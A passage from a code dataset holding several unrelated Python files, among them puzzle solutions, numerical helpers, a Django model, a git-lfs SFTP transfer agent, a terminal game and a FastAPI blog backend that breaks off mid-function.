valid_42.add(message.replace(' ', ''))\n\nfor message in find_valid_messages('31'):\n valid_31.add(message.replace(' ', ''))\n\n# 0: 8 11\n# 8: 42 | 42 8\n# 11: 42 31 | 42 11 31\n# 42 and 31 are both length 8\n# intersection of 42 and 31 is empty\n# highest length message is 96\n# possible sequences:\n# 1-10 42s + 42 31\n# 1-8 42s + 42 42 31 31\n# 1-6 42s + 42 42 42 31 31 31\n# 1-4 42s + 42 42 42 42 31 31 31 31\n# 1-2 42s + 42 42 42 42 42 31 31 31 31 31\n\nvalid_messages = []\nfor i in range(1, 11):\n start = []\n start.extend([42]*i)\n for j in range(1, 6):\n full = start[:]\n full.extend([42]*j)\n full.extend([31]*j)\n if len(full) <= 12:\n valid_messages.append(full)\n\ntotal = 0\nfor x in messages:\n parsed_message = []\n message = [x[i:i+8] for i in range(0, len(x), 8)]\n for block in message:\n if block in valid_42:\n parsed_message.append(42)\n elif block in valid_31:\n parsed_message.append(31)\n else: break\n else:\n if parsed_message in valid_messages:\n total += 1\n\nprint(total)","sub_path":"day 19/19-2.py","file_name":"19-2.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314253670","text":"import decimal\nfrom sympy import *\nimport math\nimport numpy\n\ndef getDelta(a, b):\n delta = 0\n for (lh, rh) in zip(a, b):\n delta += (lh - rh)**2\n return delta\n\ndef FirstOrderEquasion(f, a, i):\n d = D(0.00000001)\n c = a.copy()\n c[i] += d\n return (f(c) - f(a))/d\n\ndef SecondOrderEquasion(f, a, i):\n d = D(0.000000001)\n c = a.copy()\n c[i] += d\n x1 = D(f(c))\n c[i] -= 2*d\n x2 = D(f(c))\n c[i] += d\n x3 = D(f(c))\n return (x1 - 2*x3 + x2)/(d**2)\n\ndef deltaArgs(a, b):\n sum = 0\n for i in range(len(a)):\n sum += (a[i]-b[i])**2\n return sum\n\ndef inner(a, b):\n sum = D(0)\n for (x, y) in zip(a, b):\n sum += x * y\n return sum\n\ndef sqGrad(f, a):\n sum = D(0)\n for i in range(len(a)):\n sum += FirstOrderEquasion(f, a, i)**2\n return sum\n\ndef getGrad(f, a): \n argsPD = a.copy()\n for i in range(len(argsPD)):\n argsPD[i] = FirstOrderEquasion(f, argsPD, i)\n return argsPD\n\ndef goldenSectionForSteepestDespect(f, a, b, e):\n x1 = a + (b - a) * decimal.Decimal(0.381966)\n x2 = a + (b - a) * decimal.Decimal(0.618034)\n f1 = f(x1)\n f2 = f(x2)\n delta = getDelta(a, b)\n while sqrt(delta) > e:\n if f1 < f2:\n b = x2\n x2 = x1\n f2 = f1\n x1 = a + (b - a) * decimal.Decimal(0.381966)\n f1 = f(x1)\n else:\n a = x1\n x1 = x2\n f1 = f2\n x2 = a + (b - a) * decimal.Decimal(0.618034)\n f2 = f(x2)\n delta = getDelta(a, b)\n return (a + b) / D(2)\n\ndef goldenSectionForConjugateGradient(f, a, b, eps):\n a1 = D(0)\n b1 = D(1e5)\n x0 = a1 + D(0.5) * (D(3) - D(math.sqrt(5))) * (b1 - a1)\n x1 = b1 - x0 + a1\n while math.fabs(b1 - a1) > D(eps):\n l = a + x0 * b\n r = a + x1 * b\n if f(l) < f(r):\n b1 = x1\n else:\n a1 = x0\n x1 = x0\n x0 = b1 + a1 - x1\n return (a1 + b1)/D(2)\n\ndef findM(f, a1, b1, e):\n a = D(-1e3)\n b = D(1e3)\n while math.fabs(b - a) > e:\n y1 = f(a1 + a * b1)\n y2 = f(a1 + b * b1)\n c = (a + b) / 2\n if y1 < y2:\n b = c\n else:\n a = c\n return (a + b) / 2\n\ndef updateVertex(vertex, a, b):\n vertex[0].append(b[0])\n vertex[0].append(a[0])\n vertex[1].append(b[1])\n vertex[1].append(a[1])\n\ndef D(x):\n return decimal.Decimal(x)","sub_path":"lab2/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473905209","text":"from django.db import models\n\n# from .services.create_update_delete import create_row_w_validated_params\n# from .services.create_update_delete import update_row_w_validated_params\n# from .services.create_update_delete import delete_row_w_validated_params\n#\n# from .services.read import get_serialized_rows_by_id\n\n\nclass TestEnrollmentStep1(models.Model):\n consumer = models.ForeignKey('PICConsumer', on_delete=models.CASCADE)\n navigator = models.ForeignKey('Navigators', on_delete=models.CASCADE)\n cm_client = models.ForeignKey('CaseManagementClient', on_delete=models.CASCADE)\n cm_sequence = models.ForeignKey('CMSequences', on_delete=models.CASCADE)\n\n notes = models.TextField(blank=True, null=True)\n tracking_no = models.CharField(max_length=500, blank=True, null=True)\n user_name = models.CharField(max_length=500, blank=True, null=True)\n datetime_completed = models.DateTimeField(blank=True, null=True)\n\n date_created = models.DateTimeField(blank=True, auto_now_add=True, null=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n # maps model to the picmodels module\n app_label = 'picmodels'\n rest_url = 'test_enrollment_step_1'\n\n def return_values_dict(self):\n values_dict = {\n \"consumer\": self.consumer.id if self.consumer else None,\n \"navigator\": self.navigator.id if self.navigator else None,\n \"cm_client\": self.cm_client.id if self.cm_client else None,\n \"cm_sequence\": self.cm_sequence.id if self.cm_sequence else None,\n\n \"notes\": self.notes,\n \"tracking_no\": self.tracking_no,\n \"user_name\": self.user_name,\n \"datetime_completed\": self.datetime_completed.isoformat() if self.datetime_completed else None,\n\n \"date_created\": self.date_created.isoformat() if self.date_created else None,\n \"date_modified\": self.date_modified.isoformat() if self.date_modified else None,\n\n \"id\": self.id\n }\n\n return values_dict\n# TestEnrollmentStep.create_row_w_validated_params = classmethod(create_row_w_validated_params)\n# TestEnrollmentStep.update_row_w_validated_params = classmethod(update_row_w_validated_params)\n# TestEnrollmentStep.delete_row_w_validated_params = classmethod(delete_row_w_validated_params)\n# TestEnrollmentStep.get_serialized_rows_by_id = classmethod(get_serialized_rows_by_id)\n","sub_path":"picmodels/models/care_advisors/case_management_models/steps_for_sequences_models/tables_for_individual_steps_models/test_enrollment_step_1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15389121","text":"# get the equation for a Gaussian from the solutions to part I\n\n# uncomment this line if you need to\n#from __future__ import division # make division act like python3 even if 2.7\nimport numpy.random as npr\nimport numpy as np\n\nsigma=1.\nthrows=100 # play with this number -- how many darts are enough?\n\n# throw darts in box circumscribing portion of Gaussian of interest\n# width is from -sigma to +sigma\nxvals=(npr.random(throws) * 2.*sigma - 1.*sigma)\n# height is from 0 to peak value of Gaussian\nyvals=(npr.random(throws) / (sigma*np.sqrt(2.*3.14159)))\n\n# determine boundary of region as a function of x values\ngaussfunct= np.exp((-1.*xvals**2)/(2.*sigma**2))/(sigma*np.sqrt(2.*3.14159))\n\n# identify hits\nhits=np.size(np.where(yvals <= gaussfunct))\n\n# use equation area = (hits/throws) * rectangle area\n#rectarea = ?? # fill in based on equations above\n#area = (hits/throws)*rectarea # integer division here, watch out!\n\n#print(\"area is %s\" % area)\n","sub_path":"MonteCarloTutorial/partII_2.py","file_name":"partII_2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56690354","text":"import random\nimport numpy as np\nimport scipy\nclass network:\n\tdef __init__(self,inp_list):\n\t\tself.we=[]\n\t\tself.inp=inp_list\n\t\t###weight\n\t\tfor i in range(len(inp_list)-1):\n\t\t\tw=np.random.normal(0.0,1.0,(inp_list[i+1],inp_list[i]))\n\t\t\tself.we.append(w)\n\t\t\n\t\t###activation function###\n\t\tself.lr=100\n\t\t\n\tdef sigmoid(self,z):\n\t\treturn (1/(1+np.exp(-z)))\n\t\n\t#######query part#######\n\tdef predict(self,input):\n\t\tfin_list=[]\n\t\tip_val=np.array(input)\n\t\tval=np.reshape(ip_val,(self.inp[0],1))\n\t\tfor i in range(len(self.we)):\n\t\t\tfin_list.append(val)\n\t\t\tz=np.dot(self.we[i],val)\n\t\t\ta=self.sigmoid(z)\n\t\t\tval=a\n\t\tfin_list.append(val)\n\t\tresult=list(fin_list[-1])\n\t\tret=result.index(max(result))\n\t\treturn ret\n\t\t\n\tdef mutation(self,rate):\n\t\tfor j in range(len(self.we)):\n\t\t\ti=self.we[j]\n\t\t\tpoint_size=i.shape[0]*i.shape[1]\n\t\t\tnum_of_mutation=int(rate*point_size)\n\t\t\t\n\t\t\tfor _ in range(num_of_mutation):\n\t\t\t\trow=random.choice(range(i.shape[0]))\n\t\t\t\tcol=random.choice(range(i.shape[1]))\n\t\t\t\tif random.random()>0.35:\n\t\t\t\t\tself.we[j][row][col]+=1/self.lr\n\t\t\t\telse:\n\t\t\t\t\tself.we[j][row][col]-=1/self.lr\n","sub_path":"Neuro-Evolutionary model/SNAKE GAME/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"535193209","text":"def solve(x, r, c):\n total = r * c\n\n if total % x != 0:\n return True\n\n #if total / x > 1:\n # return False\n\n if x <= 2 and total >= 2:\n return False\n\n if x > 2 and min(r, c) < 2:\n return True\n\n if x > max(r, c):\n return True\n\n return False\n\n\n\n#print(solve(2, 2, 2))\n#print(solve(2, 1, 3))\n#print(solve(4, 4, 1))\n#print(solve(3, 2, 3))\n\n#print(solve(3, 2, 2))\n\nif __name__ == '__main__':\n f = open('input.txt')\n T = int(next(f))\n count = 0\n for line in f:\n count += 1\n x, r, c = [int(d) for d in line.split()]\n result = solve(x, r, c) and 'RICHARD' or 'GABRIEL'\n #print(x ,r ,c)\n print('Case #{}: {}'.format(count, result))\n\n\n","sub_path":"quali/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157492715","text":"import json\nimport os\nimport sys\nimport tempfile\nfrom argparse import ArgumentParser\nfrom getpass import getuser\nfrom logging import getLogger\nfrom os.path import expanduser\nfrom time import sleep\nfrom random import random\n\nfrom . import CustomTransferAgent\nfrom .sftp_auth import SftpAuth\nfrom .util import ERROR_CODE, handle_error\n\nlogger = getLogger(__name__)\n\n\nclass SftpAgent(CustomTransferAgent):\n\n def __init__(self, user, hostname, port, rsa_key, remote_dir, temp_dir):\n self.user = user\n self.hostname = hostname\n self.port = port\n self.rsa_key = rsa_key\n self.remote_dir = remote_dir\n self.temp_dir = temp_dir\n logger.info(\"Wait a little to avoid pipe broken\")\n sleep(random())\n logger.info(\"SftpAgent is initialized\")\n\n def init(self, event, operation, remote, concurrent, concurrenttransfers):\n logger.info(\"Enter Start stage\")\n yield \"{}\"\n logger.info(\"Exit Start stage\")\n\n def upload(self, event, oid, size, path, action):\n logger.info(\"Enter Upload stage\")\n with SftpAuth(self.user, self.hostname, self.port, self.rsa_key, self.remote_dir) as sftp:\n progress = self.Progress(oid)\n try:\n sftp.chdir(oid[0:2])\n except IOError:\n sftp.mkdir(oid[0:2])\n sftp.chdir(oid[0:2])\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n try:\n sftp.chdir(oid[2:4])\n except IOError as e:\n sftp.mkdir(oid[2:4])\n sftp.chdir(oid[2:4])\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n\n same_file_exists = False\n try:\n logger.info(\"Check existence of the same file.\")\n target_size = sftp.stat(oid).st_size\n if size == target_size:\n same_file_exists = True\n logger.info(\"A same file exists. Skip upload.\")\n res = json.dumps({\n \"event\": \"progress\",\n \"oid\": oid,\n \"byteSoFar\": size,\n \"bytesSinceLast\": 0\n })\n logger.debug(res)\n print(res, flush=True)\n else:\n logger.info(\"A same file doesn't exist (size). Start upload.\")\n except:\n logger.info(\"A same file doesn't exist (name). Start upload.\")\n try:\n if not same_file_exists:\n sftp.put(path, oid, callback=progress.progress_callback)\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n yield json.dumps({\n \"event\": \"complete\",\n \"oid\": oid,\n })\n logger.info(\"Exit Upload stage\")\n\n def download(self, event, oid, size, action):\n logger.info(\"Enter Download stage\")\n with SftpAuth(self.user, self.hostname, self.port, self.rsa_key, self.remote_dir) as sftp:\n progress = self.Progress(oid)\n temp_path = os.path.join(self.temp_dir, oid)\n logger.info(f\"temp path is {temp_path}\")\n try:\n sftp.chdir(oid[0:2])\n sftp.chdir(oid[2:4])\n sftp.get(oid, temp_path, callback=progress.progress_callback)\n yield json.dumps({\n \"event\": \"complete\",\n \"oid\": oid,\n \"path\": temp_path\n })\n except Exception as e:\n handle_error(e, ERROR_CODE.DOWNLOAD)\n logger.info(\"Exit Download stage\")\n\n def terminate(self):\n logger.info(\"Enter Terminate stage\")\n logger.info(\"Exit Terminate stage\")\n yield '{\"event\": \"terminate\"}'\n\n class Progress:\n byte_so_far = 0\n oid = None\n i = 0.0\n\n def __init__(self, oid):\n logger.info(\"Progress is initialized\")\n self.oid = oid\n\n def progress_callback(self, byte_so_far, size):\n if byte_so_far / size < self.i:\n return\n self.i += 0.1\n bytes_since_last = byte_so_far - self.byte_so_far\n self.byte_so_far = byte_so_far\n res = json.dumps({\n \"event\": \"progress\",\n \"oid\": self.oid,\n \"byteSoFar\": byte_so_far,\n \"bytesSinceLast\": bytes_since_last,\n })\n logger.debug(res)\n print(res, flush=True) # Tried, but couldn't return by yield in a callback.\n\n\ndef main_proc(user=None, hostname=None, port=None, rsa_key=None, remote_dir=None, temp_dir = None):\n logger.info(\"Enter main process\")\n logger.info(\"Wait for std input\")\n for line in sys.stdin:\n sftp_agent = SftpAgent(user, hostname, port, rsa_key, remote_dir, temp_dir)\n generator_dispatcher = {\n \"init\": lambda k: sftp_agent.init(**k),\n \"upload\": lambda k: sftp_agent.upload(**k),\n \"download\": lambda k: sftp_agent.download(**k),\n \"terminate\": lambda _: sftp_agent.terminate(),\n }\n logger.debug(line)\n try:\n data = json.loads(line)\n except Exception as e:\n logger.debug(e)\n continue\n for res in generator_dispatcher[data[\"event\"]](data):\n logger.debug(res)\n print(res, flush=True)\n logger.info(\"EOF\")\n res = next(generator_dispatcher[\"terminate\"](None))\n logger.debug(res)\n print(res, flush=True)\n\n\ndef parse_args():\n p = ArgumentParser()\n p.add_argument(\"--user\",\n default=getuser(),\n help=\"username for sftp server.\")\n p.add_argument(\"--hostname\",\n default=\"localhost\",\n help=\"hostname or ip address of sftp server.\")\n p.add_argument(\"--port\",\n default=22,\n help=\"port of sftp server.\")\n p.add_argument(\"--rsa-key\",\n default=expanduser(\"~\") + \"/.ssh/id_rsa\",\n help=\"rsa key path.\")\n p.add_argument(\"--remote-dir\",\n default=\"~/.lfs-miscellaneous\",\n help=\"absolute path of lfs objects directory. \"\n \"In Windows OS, \"\n \"in order to avoid unintentional path expansion by git-lfs \"\n \"Please add 'pyelfs://'. e.g. pyelfs:///home/user/lfs-objects\")\n p.add_argument(\"--temp-dir\",\n help=\"path of temporary directory to download lfs objects.\")\n p.add_argument(\"--debug-log\",\n help=\"debug log file.\")\n return p.parse_args()\n\n\ndef main():\n import logging\n a = parse_args()\n if a.debug_log:\n logging.basicConfig(level=logging.DEBUG, filename=a.debug_log)\n logger.info(f\"Arguments were parsed. : {str(a)}\")\n try:\n if a.temp_dir:\n a.temp_dir = os.path.sep.join(str(a.temp_dir).split(\"/\"))\n else:\n a.temp_dir = tempfile.gettempdir()\n\n if a.remote_dir.startswith(\"pyelfs://\"):\n a.remote_dir = str(a.remote_dir).replace(\"pyelfs://\", \"\")\n except Exception as e:\n logger.info(e)\n raise\n logger.info(f\"Modifid arguments. : {str(a)}\")\n main_proc(user=a.user,\n hostname=a.hostname,\n port=a.port,\n rsa_key=a.rsa_key,\n remote_dir=a.remote_dir,\n temp_dir = a.temp_dir)\n","sub_path":"pyelfs/sftp_agent.py","file_name":"sftp_agent.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"496216556","text":"import os\nfrom os import system,name\nclass dragon:\n\n def __init__(self,x,y,screen):\n self.__x=x\n self.__y=y\n self.__lives=5\n self.__lst1=[]\n self.__lst2=[]\n self.__screen=screen\n def printdragon(self,screen):\n fd=open('dragon.txt')\n xx=self.__x\n yy=self.__y\n for i in fd:\n #print(i)\n i=i.rstrip()\n for ch in i:\n self.__screen[xx][yy]=ch\n #print(xx,yy)\n yy=yy+1\n yy=self.__y\n #print()\n xx=xx+1\n \n\n def movedragon(self,x,screen):\n xx=self.__x\n yy=self.__y\n fd=open('dragon.txt')\n for i in fd:\n #print(i)\n i=i.rstrip()\n for ch in i:\n self.__screen[xx][yy]=' '\n #print(xx,yy)\n yy=yy+1\n yy=self.__y\n #print()\n xx=xx+1\n xx=self.__x\n yy=self.__y\n if self.__x > x and self.__x >3 :\n self.__x=self.__x-2\n for j in range(40):\n self.__screen[xx+12][yy+j]=' '\n for j in range(40):\n self.__screen[xx+13][yy+j]=' '\n\n if self.__x < x and self.__x <33:\n self.__x=self.__x+2\n for j in range(40):\n self.__screen[xx][yy+j]=' '\n for j in range(40):\n self.__screen[xx+1][yy+j]=' '\n\n def get_lives(self):\n return self.__lives\n def createbullet(self,player_obj):\n xx=self.__x\n yy=self.__y\n self.__lst1.append(player_obj.get_xpos())\n self.__lst2.append(yy-2)\n self.__lst1.append(xx+10)\n \n self.__lst2.append(yy-2)\n \n def movebullets(self,screen,player_obj):\n n=len(self.__lst2)\n for i in range(n):\n self.__lst2[i]=self.__lst2[i]-2\n y=self.__lst2[i]\n if y>794 and y<1000:\n if ( self.__screen[self.__lst1[i]][y+2]==':'):\n self.__screen[self.__lst1[i]][y+2]=' '\n if(self.__screen[self.__lst1[i]][y]=='#'):\n player_obj.kill()\n self.__lst2[i]=0\n elif(self.__screen[self.__lst1[i]][y-1]=='#'):\n player_obj.kill()\n self.__lst2[i]=0\n self.__screen[self.__lst1[i]][self.__lst2[i]]=':' \n def kill(self):\n self.__lives=self.__lives-1\n if self.__lives==0:\n os.system('clear')\n print('YOU WIN')\n quit()\n\n","sub_path":"dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"648700297","text":"import json\nimport os\nimport threading\nimport time\nimport hashlib\nimport base64\nimport io\n\nimport uvicorn\nimport markdown\nfrom fastapi import Cookie, FastAPI\nfrom pydantic import BaseModel\nfrom fastapi import File, UploadFile\nfrom starlette.responses import JSONResponse, StreamingResponse\n\nimport confirmCode\nimport session\nfrom pyDatabase import database\n\nsortItems = \"Python C++ Javascript Algorithm ProgrammingLife\".split(\" \")\n\napp = FastAPI()\nBASEDIR = os.path.dirname(__file__)\ndb = database.Database(os.path.join(BASEDIR, \"db.sqlite3\"))\nsession.init(db)\ncodes = {}\n\n\ndef datasToArr(blogs):\n datas = []\n for blog in blogs:\n datas.append({\n \"title\": blog.title,\n \"id\": blog.id,\n \"user\": db.get(\"user\",id=blog.user).nickname,\n \"date\": blog.date,\n \"tag\": sortItems[blog.tag],\n \"good\":len(db.filter(\"blogGood\",blogId=blog.id))\n })\n return datas\n\ndef sessionDataTimeSet(response):\n pass\n \n\n@app.get(\"/sortItems\")\nasync def getSortItemsApi():\n return {\n \"message\": \"success\",\n \"sortItems\": sortItems\n }\n\n\nclass postNewBlogArg(BaseModel):\n tag: int\n inner: str\n title: str\n\n\n@app.post(\"/blog/new\")\nasync def postNewBlogApi(item: postNewBlogArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n if len(db.filter(\"blog\", title=item.title, user=user)) != 0:\n return {\"message\": \"repeat\"}\n else:\n date = time.strftime(\"%Y-%m-%d\")\n currentTime = int(time.time())\n db.create(\"blog\", tag=item.tag, inner=item.inner, user=user,\n date=date, goodNum=0, title=item.title,htmlInner=\"\")\n return {\"message\": \"success\"}\n\n\nclass postEditBlogApi(BaseModel):\n title: str\n inner: str\n htmlInner:str\n\n\n@app.post(\"/blog/edit\")\nasync def postEditBlogApi(item: postEditBlogApi, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n blogs = db.filter(\"blog\", title=item.title, user=user)\n if len(blogs) == 1:\n blog = blogs[0]\n date = time.strftime(\"%Y-%m-%d\")\n currentTime = int(time.time())\n blog.date = date\n blog.inner = item.inner\n blog.htmlInner=item.htmlInner\n blog.save()\n else:\n return {'message': \"none\"}\n return {\"message\": \"success\"}\n\n\nclass postNewGoodArg(BaseModel):\n id: int\n\n\n@app.post(\"/blog/good\")\nasync def postNewGoodApi(item: postNewGoodArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n pls = db.filter(\"pl\", id=item.id)\n if len(pls) == 1:\n pl = pls.first()\n if user == pl.userId:\n return {\n \"message\": \"self\"\n }\n\n if len(db.filter(\"good\", plId=item.id,userId=user)) != 0:\n db.remove(\"good\",plId=item.id,userId=user)\n else:\n db.create(\"good\", plId=item.id, userId=user)\n\n return {\"message\": \"success\"}\n\nclass postNewBlogGoodArg(BaseModel):\n id:int\n@app.post(\"/blog/blogGood\")\nasync def postNewBlogGoodApi(item:postNewBlogGoodArg,sessionId=Cookie(None)):\n s=session.getSession(sessionId)\n if s:\n user=db.get(\"user\",id=s['userId'])\n else:\n return {\"message\":\"no signIn\"}\n blogs=db.filter(\"blog\",id=item.id)\n if len(blogs)==1:\n blog=blogs[0]\n goods=db.filter(\"blogGood\",blogId=item.id,userId=user.id)\n if len(goods)==1:\n goods[0].delete()\n blog.goodNum-=1\n blog.save()\n else:\n db.create(\"blogGood\",blogId=item.id,userId=user.id)\n blog.goodNum+=1\n blog.save()\n return {\"message\":\"success\"}\n else:\n return {\"message\":\"none\"}\n\n\nclass postNewPlArg(BaseModel):\n inner: str\n blog: int\n\n\n@app.post(\"/blog/pl\")\nasync def postNewPlApi(item: postNewPlArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n date = time.strftime(\"%Y-%m-%d\")\n db.create(\"pl\", userId=user, blogId=item.blog,\n inner=item.inner, date=date)\n return {\"message\": \"success\"}\n\n\nclass postSignUpArg(BaseModel):\n username: str\n nickname: str\n password: str\n code: str\n\n\n@app.post(\"/user/signUp\")\nasync def postSignUpApi(item: postSignUpArg, sessionId=Cookie(None)):\n c = codes.get(item.username, None)\n if not c or item.code.lower() != c.lower():\n return {\"message\": \"code wrong\"}\n else:\n codes.pop(item.username)\n if sessionId and session.getSession(sessionId):\n return {\"message\": \"loginned\"}\n if len(db.filter(\"user\", username=item.username)) != 0:\n return {\"message\": \"username repeat\"}\n db.create(\"user\", username=item.username,\n nickname=item.nickname, password=item.password)\n uid = db.get(\"user\", username=item.username).id\n sessionId = session.newSessionId()\n session.setSession(sessionId, {\"userId\": uid})\n response = JSONResponse(content={\"message\": \"success\"})\n response.set_cookie(key=\"sessionId\", value=sessionId)\n return response\n\n\nclass postSignInArg(BaseModel):\n username: str\n password: str\n code: str\n\n\n@app.post(\"/user/signIn\")\nasync def postSignInApi(item: postSignInArg, sessionId=Cookie(None)):\n if sessionId and session.getSession(sessionId):\n return {\"message\": \"loginned\"}\n c = codes.get(item.username, None)\n if not c or item.code.lower() != c.lower():\n return {\"message\": \"code wrong\"}\n else:\n codes.pop(item.username)\n v_user = db.filter(\"user\", username=item.username)\n if len(v_user) != 1:\n return {\"message\": \"failed\"}\n user = v_user.first()\n if user.password == item.password:\n response = JSONResponse(content={\"message\": \"success\"})\n pd = r\"{%userId%: \"+str(user.id)+r\"}\"\n ss = db.filter(\"session\", value=pd)\n if len(ss) == 0:\n sessionId = session.newSessionId()\n response.set_cookie(\n key=\"sessionId\", value=sessionId)\n session.setSession(sessionId, {\"userId\": user.id})\n return response\n else:\n sessionId = ss.first().sessionId\n response.set_cookie(\n key=\"sessionId\", value=sessionId)\n return response\n\n else:\n return {\"message\": \"failed\"}\n\n\n@app.post(\"/user/signOut\")\nasync def postSignOutApi(sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n session.removeSession(sessionId)\n response = JSONResponse(content={\"message\": \"success\"})\n response.delete_cookie(key=\"sessionId\")\n return response\n\n\nclass putChangeQmArg(BaseModel):\n qm: str\n\n\n@app.put(\"/user/changeQm\")\nasync def putChangeQmApi(item: putChangeQmArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n uid = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n user = db.filter(\"user\", id=uid)\n if len(user) == 1:\n user = user[0]\n else:\n return {\"message\": \"the id is wrong\"}\n user.qm = item.qm\n user.save()\n return {\"message\": \"success\"}\n\n\nclass putChangePasswordArg(BaseModel):\n oldPassword: str\n newPassword: str\n\n\n@app.put(\"/user/changePassword\")\nasync def putChangePasswordApi(item: putChangePasswordArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n uid = s[\"userId\"]\n else:\n return {\"message\": \"no signIn\"}\n v_user = db.filter(\"user\", id=uid)\n if len(v_user) != 1:\n return {\"message\": \"the id is wrong\"}\n user = v_user[0]\n if user.password == item.oldPassword:\n user.password = item.newPassword\n user.save()\n return {\"message\": \"success\"}\n else:\n return {\"message\": \"the password is wrong\"}\n\n\n@app.get(\"/page/home\")\nasync def getHomeDataApi(num: int):\n blogs = db.filterNum(\"blog\", \"goodNum\", reverse=True, num=num)\n datas = datasToArr(blogs)\n texts = []\n textDatas = db.filter(\"news\")\n for i in textDatas:\n texts.append(i.text)\n data = {\n \"message\": \"success\",\n \"sortItems\": sortItems,\n \"newBlogs\": datas,\n \"texts\": texts\n }\n return data\n\n\n@app.get(\"/page/tag\")\nasync def getTagDataApi(tagName: str):\n if tagName not in sortItems:\n return {\"message\": \"none\"}\n blogs = db.filter(\"blog\", tag=sortItems.index(tagName))\n datas = datasToArr(blogs)\n return {\n \"message\": \"success\",\n \"blogs\": datas\n }\n\n\n@app.get(\"/page/user\")\nasync def getUserDataApi(id: int = None, sessionId=Cookie(None)):\n if not id:\n s = session.getSession(sessionId)\n if s:\n id = s[\"userId\"]\n else:\n return {\"message\": \"no signIn\"}\n user = db.filter(\"user\", id=id)\n\n if len(user) != 0:\n user = user[0]\n blogs = db.filter(\"blog\", user=user.id)\n blogsData = datasToArr(blogs)\n return {\n \"userInfo\": {\n \"username\": user.username,\n \"nickname\": user.nickname,\n \"id\": user.id,\n \"qm\": user.qm,\n \"exp\": user.exp,\n \"k\": user.k\n },\n \"blogs\": blogsData,\n \"message\": \"success\"\n }\n else:\n return {\"message\": \"the id or username is wrong\"}\n\n\n@app.get(\"/page/blog\")\nasync def getBlogDataApi(id: int):\n v_blog = db.filter(\"blog\", id=id)\n if len(v_blog) != 1:\n return {\"message\": \"the id is wrong\"}\n blog = v_blog[0]\n d_pl = db.filter(\"pl\", blogId=blog.id)\n pls = []\n for dp in d_pl:\n pls.append({\n \"user\": db.get(\"user\", id=dp.userId).nickname,\n \"date\": dp.date,\n \"inner\": dp.inner,\n \"goodNum\": len(db.filter(\"good\", plId=dp.id)),\n \"id\":dp.id\n })\n pls.reverse()\n\n # extensions = [\n # 'markdown.extensions.extra',\n # 'markdown.extensions.codehilite',\n # 'markdown.extensions.toc',\n # 'markdown.extensions.tables'\n # ]\n \n # blogInner=list(blog.inner)\n # codeTag=0\n # i=0\n # while i=3 and blogInner[i]==blogInner[i+1]==blogInner[i+2]==\"`\":\n # codeTag+=1\n # i+=3\n # continue\n # elif blogInner[i]==\"\\n\":\n # if codeTag%2==0 and (i>len(blogInner)-3 or blogInner[i+2]!=\"\\n\") and (i<3 or blogInner[i-3:i]!=[\"`\",\"`\",\"`\"]):\n # blogInner[i:i+1]=list(\"
\\n\")\n # i+=5\n # continue\n # i+=1\n\n\n # blogInner=\"\".join(blogInner)\n # inner = markdown.markdown(blogInner, extensions=extensions)\n inner=blog.htmlInner\n return {\n \"message\": \"success\",\n \"pls\": pls,\n \"blog\": {\n \"title\": blog.title,\n \"inner\": inner,\n \"id\": blog.id,\n \"user\": db.get(\"user\", id=blog.user).nickname,\n \"date\": blog.date,\n \"tag\": sortItems[blog.tag],\n \"good\":blog.goodNum\n }\n }\n\n\n@app.get(\"/code\")\nasync def getCodeApi(username: str, method: str = \"signIn\"):\n if method == \"signIn\" and len(db.filter(\"user\", username=username)) == 0:\n return {\"message\": \"username wrong\"}\n global codes\n code, imgD = confirmCode.get()\n codes[username] = code.replace(\" \", \"\")\n\n def delCode():\n time.sleep(60)\n if codes.get(username):\n del codes[username]\n t = threading.Thread(target=delCode)\n t.start()\n return imgD\n\n\n@app.get(\"/edit/blog\")\nasync def postUploadImgApi(title: str, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = db.get(\"user\", id=s[\"userId\"])\n else:\n return {\"message\": \"no signIn\"}\n blogs = db.filter(\"blog\", title=title, user=user.id)\n if len(blogs) == 1:\n blog = blogs[0]\n return {\n \"title\": blog.title,\n \"inner\": blog.inner,\n \"id\": blog.id,\n \"message\": \"success\"\n }\n else:\n return {\"message\": \"none\"}\n\n\n@app.post(\"/edit/del\")\nasync def postDelBlogApi(id:int,sessionId=Cookie(None)):\n s=session.getSession(sessionId)\n if s:\n user=db.get(\"user\",id=s['userId'])\n else:\n return {\"message\":\"no signIn\"}\n blogs=db.filter(\"blog\",id=id,user=user.id)\n if 